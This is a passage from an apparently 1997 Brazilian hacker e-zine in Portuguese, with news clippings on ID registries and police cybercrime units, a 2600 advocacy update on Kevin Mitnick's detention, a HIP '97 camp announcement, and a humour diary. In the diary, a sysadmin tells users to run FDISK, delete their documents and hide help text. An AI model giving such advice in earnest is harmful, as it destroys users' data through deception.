recursos  para 25 Estados iniciarem a adocao do projeto. Queremos  entregar
todas as unidades da federacao ate' o fim do ano que vem.
[...]
     Outro instrumento que vai facilitar e dar mais seguranca e' o Registro
Civil  Unico.  O projeto de autoria do senador Pedro Simon preve  que  cada
brasileiro  tera'  apenas  um numero, ao inves de 21  como  e'  hoje,  para
identidade,  titulo  de  eleitor,  etc..  A  diversidade  de  numeros   tem
facilitado  a  acao  de  criminosos,  como e'  o  caso  dos  portadores  de
identidades falsas. O projeto foi aprovado no Senado e espero que em  breve
a  Camara o aprove tambem, para que eu possa sancionar essa lei  que  sera'
mais um instrumento a favor de nossa seguranca."
---------------------
BRASILEIROS TERAO 5 ANOS PARA OBTER REGISTRO UNICO  (9/4/97)
Os  atuais documentos, como carteira de identidade, vao perder  a  validade
apos esse prazo
BRASILIA  - Os brasileiros terao cinco anos para se recadrastar e  obter  o
registro  civil unico. A partir dai' os atuais documentos, como a  carteira
de  identidade, perdem a validade. Ja' o governo federal tera'  seis  meses
para  apresentar as normas para a criacao do registro unico e mais  um  ano
para  montar  a  maquina que o substitua. A Lei 9.454,  que  criou  o  novo
documento,  foi sancionada anteontem, com vetos, pelo  presidente  Fernando
Henrique Cardoso.
     Fernando Henrique vetou o paragrafo unico e os tres incisos do projeto
aprovado pelo Congresso, que tracavam regras para a composicao do numero.
--------------------------
RECEITA QUER LEI PARA INTERCAMBIO DE SIGILO (28/3/97) pg a6
BRASILIA - O secretario da Receita Federal, Everardo Maciel informou  ontem
que ja' esta' trabalhando em um projeto de lei complementar para permitir a
troca de informacoes protegidas por sigilo bancario e fiscal entre  Receita
Federal, Banco Central e outras entidades de fiscalizacao do governo. Hoje,
a  Receita tem acesso apenas ao sigilo fiscal e o Banco Central, ao  sigilo
bancario. A troca de informacoes so' e' possivel em condicoes excepcionais,
como quando uma CPI aprova a quebra de sigilo de pessoas sob investigacao.
----------------------
POLICIA INVESTIGA VENDA DE DROGAS PELA INTERNET  - 7/03/97 pg C7
Possiveis   traficantes  e  compradores  discutem  qualidade  e  preco   de
entorpecentes em conversas "on-line", em que a identificacao das pessoas e'
muito dificil de ser checada (Silvia Barsetti)
     A  policia  fluminense investiga denuncias de que traficantes  do  Rio
estariam  usando a Internet, a maior rede de comunicacao do mundo,  para  a
venda  de  drogas.  [..] Os indicios estao sendo  levantados  por  meio  de
consultas  on-line no chat - sistema que permite bate-papo em tempo real  e
no qual a identificacao e' muito dificil de ser checada.
----------------------
ZERO HORA - 25/10/96 - caderno de informatica
COMPUTADORES  SOB SUSPEITA - Policiais se especializam na  investigacao  de
operacoes eletronicas

A  Policia Federal esta' organizando um grupo para invadir  computadores  e
descobrir  detalhes  de operacoes suspeitas. O Grupo Especial  de  Busca  e
Analise  de  Computadores (Gebac) e' formado por  experts  em  informatica.
Sem  previsao  para  comecar a operar, o Gebac  esta'  sendo  treinado  por
especialistas  na  Australia, Canada' e Estados Unidos.  Enquanto  nao  ha'
solucao local para casos de escuta eletronica, a Policia Federal se vale de
um  acordo  de  cooperacao com autoridades  estrangeiras.  Antonio  Augusto
Araujo, diretor do Instituto Nacional de Criminalistica, diz que quando for
necessario  sera'  solicitada  a ajuda da policia  dos  Estados  Unidos,  o
Federal Bureau de Investigacao (FBI) ou do servico de inteligencia  daquele
pais, a Central Intelligence Agency (CIA).
     No Brasil, a quebra do sigilo eletronico esta' regulamentada pela  Lei
9.296  de 24 de julho de 1996. Criada para os casos de  escuta  telefonica,
tambem  se  aplica a interceptacao de fluxo de comunicacao em  sistemas  de
informatica  e  telematica.  A pena prevista e' de dois a  quatro  anos  de
prisao  e multa. Desde a sua regulamentacao, nao se tem registro de  que  a
lei tenha sido aplicada a hackers.
[..]
     Enquanto  o  Gebac  nao  entra em campo, a  PF  conta  com  acordos  e
parcerias  com os policiais dos Estados para vasculhar os  computadores  de
pessoas ou operacoes suspeitas. A Secretaria da Justica e Seguranca Publica
do Rio Grande do Sul ja' esta' preparada para a utilizacao desta tecnologia
em operacoes policiais.[..]"Normalmente recorremos a UFRGS quando existe  a
necessidade de obter dados mais precisos", afirma a diretora de Divisao  de
Pericias da Capital, Maria Cristina Farias.
----------------------

         UMA SEMANA NA VIDA DO ADMINISTRADOR DE SUPORTE DO INFERNO
         =========================================================

(Traduzido  do  original  por Fabricio A. M. de  um  texto  americano  meio
famoso.  Qualquer  semelhanca e' mera coincidencia. O texto e'  humor,  pra
quem nao pegou o espirito da coisa. Nao e' pra sair imitando)

Segunda
8:05am
Usuario chama dizendo que perdeu a password.
Eu disse a ele para usar um utilitario de recuperacao de senhas chamado
FDISK. Ignorante, ele me agradecu e desligou.
Meu Deus! E a gente ainda deixa essas pessoas votarem e dirigirem?

8:12am
A Contabilidade chamou para dizer que nao conseguiam acessar a base de
dados de relatorios de despesas.
Eu dei a resposta Padrao dos Administradores de Sistema #112: "Engracado...
Comigo funcionou...".
Deixei eles pastarem um pouco enquanto eu desconectava minha cafeteira do
No-Break e conectava o servidor deles de volta.
Sugeri que eles tentassem novamente. Ah... Mais um usuario feliz...

8:14 am
O Usuario das 8:05 chamou dizendo que recebeu a mensagem: Erro no acesso ao
drive 0.
Disse a eles que isso era problema de SO e: transferi a ligacao para o
microsuporte.

11:00 am
Relativamente calmas, as ultimas horas.
Decidi reconectar o telefone do suporte para ligar pra minha namorada.
Ela disse que os pais dela virao pra cidade nesse fim-de-semana.
Pus ela "em-espera" e transferi a ligacao para o almoxarifado.
Que e' que ela esta' pensando?
Os torneios de "Doom" e "Myst" sao neste fim-de-semana!

12:00 pm
almoco.

15:30 pm
Retorno do almoco.

15:55 pm
Acordei da soneca.
Sonhos ruins me dao tremores.
Empurrei os servidores sem razao.
 Voltei pra soneca.

16:23 pm
Outro usuario liga.
Quer saber como mudar fontes em um formulario.
Perguntei que chip eles estao usando.
Falei pra eles ligarem novamente quando descobrirem.

16:55 pm
Resolvi rodar a macro "Criar Salvar/Replicacao de Conflitos" para que o
proximo turno tivesse algo a fazer...

Terca
8:30 am
Terminei a leitura do log de suporte da noite anterior. Pareceram ocupados.
Tempos terriveis com Salvar/Replicacao de Conflitos..

9:00 am
Gerente de suporte chega. Quer discutir minha atitude. Cliquei no
PhoneNotes SmartIcon. "Adoraria, mas estou ocupado. ", gritei enquanto
pegava as linhas de suporte, que (misteriosamente) acenderam.

9:35 pm
O chefe da equipe de P&D precisa de ID para novos empregados.
Disse ele que precisava do formulario J-19R=3D9C9\\DARR\K1.
Ele nunca tinha ouvido falar de tal formulario.
Disse a ele que estava no banco de dados de FORMULARIOS ESPECIAIS.
Ele nunca ouvira falar de tal banco de dados.
Transferi a ligacao para o almoxarifado.

10:00 am
Ana ligou pedindo um novo ID.
Eu disse que precisaria da matricula, nome de depto, nome do gerente e
estado marital. Rodei @DbLookup nos bancos de dados de Controle de Doencas
e nao achei nada.
Disse a ela que o novo ID estaria pronto de noite.
Relembrando as licoes de "Reengenharia para Parceria de Usuarios",
ofereci-me para entregar pessoalmente em sua casa.

10:07 am
O cara do almoxarifado passou por aqui dizendo que estava recebendo
ligacoes estranhas ultimamente. Ofereci a ele um treino em Notes. Comecando
agora. Deixei ele olhando a console enquanto sai' para fumar.

13:00 pm
Voltei da pausa para o cigarro. O almoxarife disse que os telefones ficavam
tocando demais, entao ele transferia as ligacoes pra moca da cafeteria.
Comeco a gostar desse cara.

13:05 pm
Grande Comocao! Gerente de suporte cai num buraco aberto onde eu tinha
tirado os tacos, na frente da porta do seu escritorio. Falei pra ele da
importancia de nao entrar correndo na sala do computador, mesmo que eu
grite "Meudeus -- Fogo!!"

14:00 pm
A secretaria juridica liga e diz que perdeu a password. Pedi a ela que
cheque sua bolsa, chao do carro e no banheiro. Disse que provavelmente caiu
das costas da maquina. Sugeri que ela ponha durex em todas as entradas de
ar que ela ache no PC. Grunhindo, ofereci-me para lhe dar nova ID enquanto
ela colava os durex...

14:49 pm
O almoxarife voltou. Quer mais aulas. Tirei o resto do dia de folga.

Quarta
8:30 am
Detesto quando os usuarios ligam pra dizer que o chipset nao tem nada a ver
com fontes em um formulario. Disse a eles "claro, voces deviam estar
checando o "bitset" e nao "chipset". Usuario bobo pede desculpa e desliga.

9:10am
Gerente de suporte, com o pe engessado, volta ao escritorio. Agenda um
encontro comigo para 10:00am. Usuario liga e quer falar com o gerente de
suporte sobre terriveis socorros na mesa de suporte. Disse a eles que o
gerente estava indo a uma reuniao. As vezes a vida nos da' material...

10:00 am
Chamei o Luiz do almoxarifado pra ficar no meu lugar enquanto vou no
escritorio do gerente. Ele disse que nao pode me demitir, mas que pode
sugerir varios movimentos laterais na minha carreira. A maioria envolvida
com implementos agricolas no terceiro mundo. Falando nisso, perguntei se
ele ja' sabia de um novo bug que pega texto indexado dos bancos de dados e
distribui aleatoriamente todas as referencias.
A reuniao foi adiada...

10:30 am
Disse ao Luiz que ele esta' se saindo muito bem. Ofereci-me para mostra-lo
o sistema corporativo de PBX algum dia...

11:00 am
almoco.

16:55 pm
retorno do almoco.


17:00 pm
Troca de turno. Vou pra casa.

Quinta
8:00 am
Um cara novo (Jonas) comecou hoje. "Boa sorte", disse a ele.
Mostrei-lhe a sala do servidor, o armario de fios e a biblioteca tecnica.
Deixei-o com um PC-XT. Falei pra ele parar de choramingar. O Notes rodava
igual, tanto em monocromo quanto em cores.

8:45 am
Finalmente o PC do novato deu boot. Disse a ele que iria criar novo usuario
pra ele.
Setei o tamanho minimo de password para 64. Sai' pra fumar.

9:30 am
Apresentei o luiz ao Jonas. "Boa Sorte", comentou o Luiz. Esse cara nao e'
o maximo?

11:00 am
Ganhei do Luiz no domino. Luiz sai. Tirei o resto das pecas da manga
("tenha sempre backups").
Usuario liga, diz que servidor de contabilidade esta' fora do ar.
Desconecto o cabo Ethernet da antena do radio (melhor recepcao) e ligo de
volta no hub.
Disse a ele que tentasse novamente. Mais um usuario feliz!

11:55 am
Expliquei ao Jonas a politica corporativa 98.022.01
"Sempre que novos empregados comecam em dias que terminam em 'A' estao
obrigados a prover sustento e repouso ao analista tecnico senior do seu
turno"
Jonas duvida. Mostrei o banco de dados de "politicas corporativas".
"Lembre-se, a pizza e' de peperoni, sem pimenta!", gritei enquanto Jonas
pisa no taco solto ao sair.


13:00 pm
Oooooh! Pizza me da' um sono...

16:30 pm
Acordo de uma soneca refrescante. Peguei o Jonas lendo anuncios de emprego.

17:00 pm
Troca de turno. Desligo e ligo o servidor varias vezes (Teste do botao
ON-OFF...). Ate' amanha...

Sexta Feira
8:00 am
Turno da noite continua tendo problemas para trocar unidade de forca do
servidor.
Disse a eles que estava funcionando direito quando sai.

9:00 am
Jonas nao esta aqui ainda. Decidi que deveria comecar a responder as
chamadas eu mesmo.

9:02 am
Chamada de usuario.
Diz que a base em Sergipe nao consegue replicar.
Eu e Luiz determinamos que e' problema de fuso horario.
Mandei eles ligarem para Telecomunicacoes.

9:30 am
Meu Deus! Outro usuario! Eles sao como formigas, Dizem que estao em Manaus
e nao conseguem replicar com Sergipe.
Falei que era fuso horario, mas com duas-horas de diferenca.
Sugeri que eles ressetasse o time no servidor.

10:17 am
Usuario do Espirito Santo liga.
Diz que nao consegue mandar mail pra Manaus.
Disse pra eles setarem o servidor para 3 horas adiantado.

11:00 am
E-mail da corporacao diz para todos pararem de ressetar o time dos
servidores.
Troquei o "date stamp" e reenviei para o Acre.

11:20 am
Terminei a macro @FazerCafe. Recoloquei o telefone no gancho.

11:23 am
O Acre liga, perguntando que dia e' hoje.

11:25 am
Gerente de suporte passa pra dizer que o Jonas pediu pra sair.
"Tao dificil achar boa ajuda...", respondi.
O gerente disse que ele tem um horario com o ortopedista essa tarde e
pergunta se eu me impor em substitui-lo na reuniao semanal dos
administradores. "No problems",  eu respondo.

11:30 am
Chamo Luis e digo que a oportunidade bate `a sua porta e ele e' convidado
para um encontro essa tarde.
"Claro, voce pode trazer seu jogo de domino", digo a ele.

12:00 am
almoco:

13:00 pm
Comeco backups completos no servidor unix. Redireciono o device para NULL
para o backup ser mais rapido.

13:03 pm
Backup semanal completo. Cara, como eu gosto da tecnologia moderna!

14:30 pm
Olho o banco de dados de contatos de suporte.
Cancelo o compromisso de 2:45pm.
Ele deve ficar em casa descansando.

14:39 pm
Outro usuario ligando.
Diz que quer aprender a criar um documento de conexao.
Digo a ele para rodar o utilitario de documentos CTRL-ALT-DEL
Ele disse que o PC rebootou. Digo a ele para chamar o microsuporte.

15:00 pm
Outro usuario (novato) liga. Diz que a macro periodica nao funciona.
Disse a ele para incluir a macro @DeleteDocument no final da formula e
prometi a ele mandar-lhe o anexo do manual que indica isso.

16:00 pm
Acabei de trocar a cor de frente de todos os documentos para branco.
Tambem setei o tamanho da letra para 2 nos bancos de dados de ajuda.

16:30 pm
Um usuario liga pra dizer que nao consegue ver nada em nenhum documento.
Digo a ele para ir no menu Edit, opcao Select all, e apertar a tecla Del e
depois refresh.
Prometi mandar-lhe a pagina do manual que fala sobre isso.

16:45 pm
Outro usuario liga. Diz que nao consegue ver os helps dos documentos.
Digo a ele que irei consertar. Mudei a fonte para WingDings.

16:58 pm
Conectei a cafeteira no hub Ethernet pra ver o que acontece...
Nada... (muito serio).

17:00 pm
O turno da noite apareceu. Digo a eles que o hub esta' agindo estranho
Desejo um bom fim-de-semana.


----------------------------------------------------------------


                        ULTIMAS NOTICIAS DO MITNICK
                        ===========================

   Update: Thursday, March 3, 1997 - traducao pagina www.2600.com/mitnick

Fazem agora dois anos que Kevin Mitnick foi preso em Carolina do Norte  por
ser um hacker de computador "America's Most Wanted". Ate' este dia ele  nao
foi ainda levado a julgamento e nao tem indicacao de qualquer especie sobre
o que o aguarda para o futuro.
     Recentemente,  Kevin foi mantido em solitaria por 4 dias  por  nenhuma
razao aparente. Uma coisa e' clara, porem. NAO foi porque ele tinha  muitas
latas  de  atum, como foi dito na revista Wired(*).  Aquela  peca  procurou
fazer  um sarro da encrenca do cara e nao fez nada para chegar ao fundo  da
historia. De acordo com a ordem de detencao, ele foi colocado na  solitaria
porque  era uma "preocupacao da seguranca". As autoridades de alguma  forma
(sem  nem  procurarem  na cela de Kevin) chegaram a conclusao  de  que  ele
estava pronto para modificar um Walkman e transforma-lo num transmissor FM.
Eles  estavam  com  medo  de que ele fosse  coloca-lo  dentro  de  um  seus
escritorios.  Como Kevin Mitnick, sendo um prisioneiro, poderia  ter  ganho
acesso  a  um  dos  escritorios deles esta' alem  da  nossa  capacidade  de
compreensao.  De qualquer forma, esta foi a razao pela qual ele foi  levado
de sua cela.
     Apos revistarem a mesma, guardas descobriram que ele tinha um ou  duas
violacoes  menores  (**)  incluindo muitas latas de atum. Nao foi  a  razao
inicial pela qual ele foi colocado na solitaria, porem. Desde seu  retorno,
muito de sua propriedade (***) nao foi devolvido, incluindo numeros da 2600
e  Phrack  que  Kevin considera pertinentes ao seu  caso.  Enquanto  estava
metido   na   solitaria,  todos  os  documentos  legais  (%)   foram   mais
provavelmente vistoriados pelas autoridades.
     Enquanto  ele estava capturado na Carolina do Norte, Kevin aceitou  um
acordo  que permitia  assumir a culpa para uma contagem de possessao de  15
ou mais ESN/MINs, o que recentemente foi definido como "artigos de acesso".
Este  acordo permitiu a ela ser transferido para a California onde  poderia
ser sentenciado por esta e outras violacoes de soltura.
     Originalmente, so' havia 23 acusacoes contra ele, uma por cada chamada
de  fone celular que tinha feito. Cada uma dessas acusacoes tinha uma  pena
maxima de 20 anos! Dentro do acordo, a sentenca variaria entre 2 e 8  meses
por chamada.
     Ao  retornar  da  Carolina do Norte, ele tambem foi  acusado  de  seis
alegacoes que ele violou a condicional. Duas foram retiradas em abril de 96
e  Kevin entrou com uma acao contra duas alegacoes adicionais ja' que  eram
posteriores  ao  fim  da condicional. Por estas  alegacoes,  as  linhas  de
sentenciamento  sugerem  um  total de 4 a 6 meses. O governo  quer  ele  na
cadeia  por dois anos. Estes dois anos, mais os oito meses do acordo  feito
na  Carolina  do  Norte (que o governo americano  quer  botar  tudo  junto)
totalizam 32 meses.
     Do  que se conclui que Kevin pode servir 32 meses em prisao antes  que
as  acusacoes na California sejam encaminhadas. Obviamente, o logico  seria
trazer  todas  as sentencas ao mesmo tempo. Mas o governo  nao  quer  fazer
isso.
     O  advogado  da  promotoria (David Schindler) disse que  se  Kevin  se
recusar  a  assinar o pedido de acordo, o governo poderia empurrar  o  dito
pelo  pais para enfrentar acusacoes em outras jurisdicoes. Ele  tambem  foi
dito que ha' acusacoes contra ele do estado da Carolina do Norte aguardando
tao logo sua sentenca atual termine. O governo esta' procurando usar o caso
Mitnick  para mandar uma mensagem para os hackers de computador de  todo  o
pais. Nesse exato instante, a unica mensagem que vemos e' de que alguem que
nunca  foi  provado  ter danificado um sistema de computador  ou  ter  tido
qualquer  tipo de compensacao financeira  esta' sendo mantido preso sem  um
julgamento por gente bem poderosa.
     E'  tatica  comum para a Promotoria ir atras de  alguem  tantas  vezes
quanto  necessario ate' conseguir a sentenca que eles querem. Se  eles  nao
conseguem a sentenca que querem na primeira rodada, eles rolam os dados  de
novo  no proximo distrito. E ja' que ninguem esta' questionando isto,  eles
podem manter a coisa indefinidamente.
     Acredita-se que uma vez que as autoridades finalmente consigam  passar
por  cima  das acusacoes, vao fazer parecer que o Kevin roubou  milhoes  de
dolares  em  software. Mas representantes da Motorola, uma  das  companhias
involvidas, mantem que tal fraude nao ocorreu.
     Imediatamente apos ser indiciado em 25 contagens em setembro de 96,  o
advogado de Kevin preencheu um pedido para a folha de especificidades,  que
e'  basicamente  u pedido p. ser mais especifico contra o  que  ele  estava
sendo  acusado.  Kevin  so'recebeu tambem uma pequena parcela  do  que  foi
descoberto (qualquer tipo de documentos ou evidencia para ser usado  contra
ele). Considerando que esteve dois anos preso, esta falha e' ultrajante.
     A proxima seria no dia 15 de abril de 1997.
Littman,  que escreveu "O jogo do fugitivo", da' um relato mais apurado  da
coisa toda.

   For a really good summary of the latest Mitnick happenings, check out
   Jon Littman's Fugitive Game update site at:
   http://www.well.com/user/jlittman/game/news.html

Voce  pode escrever para Mitnick (dando uma forca ou  pelo  menos
pro cara saber que nao esta' so', abandonado no mundo) no endereco:

   Kevin Mitnick 89950-012
   P.O. Box 1500
   Los Angeles, CA 90053-1500


   E X C L U S I V E  K E V I N  M I T N I C K  U P D A T E


    "Eles  jogaram o Kevin no buraco na terca", disse Saul  Moore,  um
    interno no Centro de Detencao Metropolitano de Los Angeles.  "Eles
    disseram que  e' porque ele esta' sendo investigado como risco  de
    seguranca.   Foi  dito  que  ele  representa  um  perigo  para   a
    instituicao.   Ele   pode  ter  dito  alguma  coisa   sobre   usar
    computadores para alguem."

    Moore  disse  que  as autoridades levaram as  calcas,  revistas  e
    livros  de Mitnick. "Ele esta'sentado na sua cela de  cuecas."  Eu
    perguntei a Moore como ele sabia disso tudo. "Os dutos," explicou.
    "Nos (prisioneiros) podemos nos comunicar."

    Mitnick  ligou no ano novo. "Eu estava na biblioteca as 10:30,  na
    sexta,"  disse quase imediatamente, me dando um resumo. "As  10:45
    eu  cheguei  na minha cela. Eles nao me deixavam entrar  na  minha
    unidade. Eu vi um dos policiais que conhecia. Ele disse, "voce ta'
    numa m(*) seria, voce vai pro buraco".

    Mitnick  nao  estava certo sobre o que que era. Um  guarda  estava
    ensacando seus papeis legais, revistas e livros. Ele especulou que
    queriam dar uma fucada na sua linha de defesa.

    "E' por causa das latas de atum?" perguntou. O fussador de  micros
    nao comia muito da comida da prisao e amontoou 72 latas de atum na
    sua cela.

    "Nao. Eu nao posso te dizer", teria dito o guarda. A medida que os
    guardas  levaram  Mitnick  embora,  ele gritou  o  numero  do  seu
    advogado para um presidiario, que anotou, mas teve o papel  tomado
    por  outro  guarda. Nem iriam os guardas permitir  que  o  proprio
    Mitnick chamasse seu advogado.

    Ele  foi revistado, algemado e levado para a solitaria unidade  de
    confinamento  da prisao, a cela 8. Nenhum dos guardas lhe diria  o
    que  tava rolando. Trancaram-no no que e' chamado cela  de  quatro
    pontas.  "E'  onde  poem os presos mais  incontrolaveis.  Eles  te
    amarram numa mesa de metal," lembra Mitnick. "Eu estava com  medo.
    Eles me despiram e deixaram la', nu."

    Mitnick   "mucuzou"   o  numero  do  seu   advogado   atraves   da
    "Intervento",  (duto  de  ventilacao  usado  p.  comunicacao)   na
    esperanca  que um amigo presidiario telefonasse seu advogado  e  a
    familia  pra pedir ajuda. Disse ele ter ouvido que  "estava  sendo
    investigado como ameaca de seguranca," mas ele se perguntou tambem
    se o governo nao estava "brincando" com ele.

    "Eles  acreditavam  que eu tinha o conhecimento ou know  how  para
    modificar um Walkman normal num transmissor"

    Algum  tempo  depois  das 17:00, entregaram p.  ele  um  papel  da
    administracao da detencao que disse que ele estava sob investigacao
    por  uma "questao de seguranca". Mitnick foi pedido que  assinasse
    o  documento,  reconhecendo  a posse do  material  confiscado:  16
    envelopes  contendo  seus  papeis  legais  e  busca  da  internet,
    revistas e artigos de radio amador, eletronica e computadores, seu
    walkman, relogio e latas de atum.

    Quase dez horas depois de cair na solitaria, Michelle Caswell,  um
    associado   da   firma  de  advogacia  de   Mitnick,   chegou.   A
    "Interventilacao" funcionou. Os oficiais da prisao  providenciaram
    uma  camiseta  e short de prisao p. a visita.  Caswell  pediu  que
    fosse tambem fornecido uma escova de dentes e cobertor. Ela estava
    recebendo  historias conflitantes sobre porque Mitnick havia  sido
    colocado  na  solitaria.   Um guarda disse que foi por  causa  das
    latas  de atum na cela; outro disse que foi por causa de  segredos
    que  Mitnick tinha aprendido e a informacao que tinha guardada  na
    cela.

    Foram  quatro dias passados em confinamento na  solitaria.  Quando
    saiu  nao  estava certo ainda qual a razao da blitz  e  tambem  da
    solitaria.  Muito  do  material  confiscado  foram  impressos   da
    internet  que  os  amigos  tinham  enviado,  material   disponivel
    publicamente. "eu ainda gostaria de chegar ao fundo da questao  do
    porque  invadiram minha cela," me disse, sem o humor que  uma  vez
    escutei na sua voz.. "foi isto para pegar meus papeis (legais)  ou
    um tratamento p me f(*)?"

    Nos dias seguindo sua soltura Mitnick ouviu uma nova teoria  sobre
    o  porque  ele  foi  punido. "Agora estao  dizendo  que  eu  tinha
    material legal demais na minha cela. Eles me disseram que foi  por
    causa  das  minhas notas sobre outros casos de hackers,  todos  os
    numeros  da 2600, o caso Neidorf. Eu estava anotando tudo  para  o
    meu advogado."

    O  advogado  de  Mitnick  se  encontrou  com  um  guarda  e  ouviu
    finalmente  porque  o hacker foi despido, revistado  e  jogado  na
    solitaria. "Eles acreditavam que eu tinha o conhecimento ou  know-
    how para modificar um radio walkman num transmissor", disse.
    [...]
    "Ridiculo,  eu  nao tinha ferro de soldar  ou  outros  componentes
    necessarios" e alem disso "estou preso numa cela. Como vou colocar
    o  transmissor  nos escritorios deles".  Pra  simplificar,  nenhum
    walkman modificado foi achado.

    Quando  o  material  legal de Mitnick foi devolvido  (mas  nao  as
    listagens  da  internet  e outras possessoes) o  hacker  notou  um
    buraco no seu documento mais confidencial, a cronologia dos  fatos
    que  preparou  para  o seu  advogado.  "E'  muito  suspeito,"disse
    Mitnick. Eu ainda nao sei ate' hoje se eles copiaram meu  material
    legal (de defesa)."

NOTA  DO  BARATA ELETRICA: Comparado com o  presidiario  comum  brasileiro,
ate' que o Kevin nao esta' apanhando muito. Mas quando voce pensa que  isso
acontece nos EUA, que seria o maior exemplo de democracia, a coisa fica  um
pouco  mais seria.  Esse tempo de prisao que ele sofreu ate'  agora,  quase
dois anos, nao vai contar quando ele receber a pena. E o sujeito ainda  nao
foi  acusado  tecnicamente  acusado  de nada. O  preso,  de  acordo  com  a
legislacao americana, (***) pode ou nao ter o direito de ter algo que chame
de  propriedade, coisas pessoais. Papeis contendo  informacoes  necessarias
(%) para a defesa podem ser guardados na cela e estudados pelo detento. Mas
e'  comum  os  presidiarios  reclamarem de  carcereiros  que  roubam  esses
objetos,  por gana, maldade ou amendrontar os presos.  E obvio, tem  coisas
que  o preso nao pode possuir em sua cela, as vezes e' tolerada,  as  vezes
nao  (tipo  comida extra, bebida, etc).. Pelo menos foi o  que  entendi  do
filme "grito de liberdade".

ADENDO: Ate' o fechamento desta edicao, nao havia noticias sobre como foi a
audiencia  no  dia  15/04  .  O mais proximo de um  relato  era  de  que  o
responsavel  pela  condicional de Mitnick havia deturpado alguns  fatos.  A
coisa  toda  foi adiada para mais tarde, outra audiencia.  A  revista  2600
montou uma lista de discussao (em ingles, parece obvio, mas tem muito  cara
que precisa saber disso) para ajudar. O endereco para subscricao e':
majordomo@2600.com
E no texto, os dizeres:
subscribe mitnick
Nao precisa de nada no "subject".
Eles  mandam uma carta com instrucoes para voce confirmar a inscricao e  ..
pronto.  Talvez o que mais ajude seja um postal dando uma forca  pro  cara,
que deve se achar sozinho no mundo.


        ==========================================================

                 ALGUNS ENCONTROS DE HACKERS NO MUNDO TODO
                 =========================================

Vao  rolar alguns encontros de hackers num futuro proximo,  melhor  dizendo
8/agosto  nos EUA e na Holanda, alem do Access All Areas na Inglaterra,  em
julho  e  o Defcon em Las Vegas, nos EUA em julho tambem. Aqui  vao  alguns
anuncios. Se alguma revista se interessar em pagar as despesas de viagem em
troca de reportagens, to^ aceitando ofertas... Com a grande vantagem de que
ja'  sou  conhecido do Computer Underground Internacional (sair na  2600  3
vezes  contando sobre o Brasil ajuda um pouco) e posso conseguir a  palavra
dos caras bem mais facil...

                                  HIP '97

                            http://www.hip97.nl


   What is HIP?

   HIP is an acronym for 'Hacking In Progress'. It will take place on the
   Friday 8th, Saturday 9th and Sunday 10th of August 1997 at campsite
   Kotterbos, Aakweg, Almere in The Netherlands. The campsite is about a
   30 minutes drive from Amsterdam.

   Remember 'Hacking at the End of the Universe' (HEU) in 1993? The
   people that published Hack-Tic, a computer underground magazine in The
   Netherlands, organized it. Hundreds of hackers, phone phreaks,
   programmers, computer haters, data travellers, electro-wizards,
   networkers, hardwarefreaks, techno-anarchists, communications junkies,
   cyber- and cypherpunks, system managers, stupid users, paranoid
   androids, Unix gurus, whizz kids and warez dudes spent three days
   building their own network between their tents in the middle of
   nowhere, located in the Flevopolder in The Netherlands.

   HIP will be the sequel to HEU. A campsite full of PCs, laptops, and
   Unix machines, all connected via an intertent Ethernet that is
   connected to the Internet. People from all over The Netherlands and
   other countries will come together to learn and discuss the benefits,
   as well as the risks of new technologies. They'll listen to lectures,
   join workshops, enjoy special presentations and, last but not least,
   party, all of this in a friendly open-air environment of a very wired
   campsite far away from the civilized world.

   HIP will happen on the same days as Beyond HOPE, a hacker convention
   in New York, organized by the people of 2600 Magazine. There will be
   audio and video links between both events, and we're working on cool
   gadgets to further enhance your sense of 'grassroots telepresence'.
   This will be a twin-event in the true sense of the word.

   Who is organizing HIP?

   Once there was a little magazine in The Netherlands called 'Hack-Tic',
   and it published wild ways to play tricks on the information
   infrastructure of the world. The magazine doesn't exist anymore, but
   most of the people that wrote articles for the magazine or helped
   organize Hacking at the End of the Universe (1993) and even some of
   the people that helped put up the Galactic Hacker Party (1989) are
   still in touch with each other. The every-four-year-itch has gotten to
   us again...

   It's going to be quite a project to organize something that is better
   than HEU, but we're not facing it alone. We'll get lots of people to
   help us.
   The hackers that were present at HEU have successfully infiltrated in
   key positions to aid in the upcoming political takeover as was agreed.
   Many have the agreed-upon provisions in their job contracts since
   1993, stating they would need time off for the final strategic
   meeting.

   HIPcamp and HIPnet

   There'll be no hotel rooms or anything like that so you'll want to
   bring at least a tent and a sleeping bag to HIP, even if this means
   you can't bring the paper-tape unit that came with your VAX 11/780.
   We'll supply a campground, toilets, showers, good food and electrical
   power (as close to 220V/50Hz as possible) and we'll do our best to
   supply everyone who wants it with an Ethernet connection. You will
   probably be able to trade wiring, extra outlets, Ethernet cards, and
   the use of modular crimping tools for almost anything.

   HIPcamp will open on August 5th, three days before HIP starts. If you
   decide to join in that early expect pretty primitive circumstances. If
   you don't care about that, or think that's the best part, you can help
   build HIPnet and all other facilities.

   HIP stuff

   A lot can and will happen in the coming months, and we'll keep adding
   new topics even during the event itself. But we're definitely going to
   discuss the legal situation regarding encryption, as well as the
   latest technical developments in this field. The current decay of the
   Usenet, copyright issues, censorship as well as many other
   legislative, social, political and technical issues surrounding
   Internet will be discussed. Computer security, or the lack thereof
   will also be a hot topic. We'll have research workshops (i.e. GSM and
   chipcard security) and you can also join many 'how-to' workshops and
   lectures where you can pick up on Linux (Unix you can run at home, not
   built by Microsoft), perl (a very powerful computer language) and
   many, many other topics.

   Tired of all these lectures and workshops? Just sit down, smoke or
   drink socially accepted substances, interact with other humans,
   volunteer for kitchen work and have a good time. We've had people at
   the previous event that were not into computers at all, and they had
   fun.

   We'd like to receive as many ideas from you as possible at this stage.
   So if you (and some of your friends) want to organize a lecture or
   workshop, please let us know. If you keep having this wacky dream
   about some project or construction that would work really well in an
   environment with lots of other freaks, this is your call to action. We
   dream of an event with thousands of creators and no audience.

   No audience?

   We'll try to offer different ways for the Internet population to truly
   interact with the events at HIP. Please get in touch if you'll have
   some friends at your house and you want to have CU-SeeMe or other
   connections to us. We'll also be broadcasting live and buffered feeds
   of audio and video on the net. Mass-media coverage will be provided
   for the interactively challenged.

   Press

   All press is welcome to visit HIP, but there will be a few strict
   rules. All members of the press will pay the entrance fee, no
   discussion about this. There will be a part of the campsite that is
   off-limits to all press. No filming, photographing or recording is to
   take place there. Some people like to have a press-free moment, some
   have employment-related reason for shunning media attention.

   What else?

   Many more things could be said but it is still a bit early. The main
   networking tent and the bar will be open 24 hours a day and we'll have
   a depository to stash your laptops, backpacks and other valuables. We
   haven't figures out the exact entrance fee, but, just like HEU, HIP is
   going to be a non-profit event. And if you haven't guessed it yet: all
   workshops and plenary events will take place in English.

   I want to be HIP too!

   Don't worry: you can be! Subscribe to the announcement mailing list.
   It's spam-free and will only carry HIP announcements written by us.
   You can also participate in the ongoing, yet slightly messy debate in
